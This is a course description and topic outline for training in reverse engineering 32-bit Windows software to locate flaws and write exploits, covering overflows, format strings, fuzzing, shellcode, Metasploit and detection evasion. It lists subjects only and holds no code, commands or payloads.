This course will familiarize students with all aspects of reverse engineering (reversing) Windows 32-bit applications for the purposes of locating flaws and developing exploits. By the end of this course students will be able to understand, locate, and exploit all of the common flows in 32-bit Windows software. These flaws include, but are not limited to, buffer overflow, heap overflows, format string flaws, section overflows, and kernel flaws. Along the way students will gain a better understanding of how Windows 32-bit applications work and will be exposed to a number of common reversing tools such as specialized debuggers (IDA Pro) and fuzzers. As always, you will also learn how to leverage Python and other scripting tools in order to automate the discovery and exploitation of software flaws.
A non-exhaustive list of topics to be covered includes:
- Getting started
- Acquiring software
- Virtualization
- Debuggers
- IDA Pro
- Freeware Windows debuggers
- Scripting tools
- Decompilers
- Fuzzers
- Acquiring software
- Setting up your testing environment
- A little Assembly
- Basics of 32-bit Intel Assembly
- Calling conventions used by Windows
- Stack overflows
- Theory
- Locating
- Calculating offsets
- Payload delivery
- Exploit techniques
- Stack protectors
- Heap overflows
- Theory
- Locating
- Payload delivery
- Exploit techniques
- Format string flaws
- Theory
- Locating
- Payload delivery
- Exploit techniques
- Section overflows and kernel flaws
- Theory
- Locating
- Payload delivery
- Exploit techniques
- Automation
- Automating flaw discovery
- Python
- Shell scripting
- Fuzzers
- Automating flaw discovery
- Shellcoding basics
- Theory
- Where to get shell code
- Writing your own shell code
- Metasploit
- Creating exploit modules
- Avoiding detection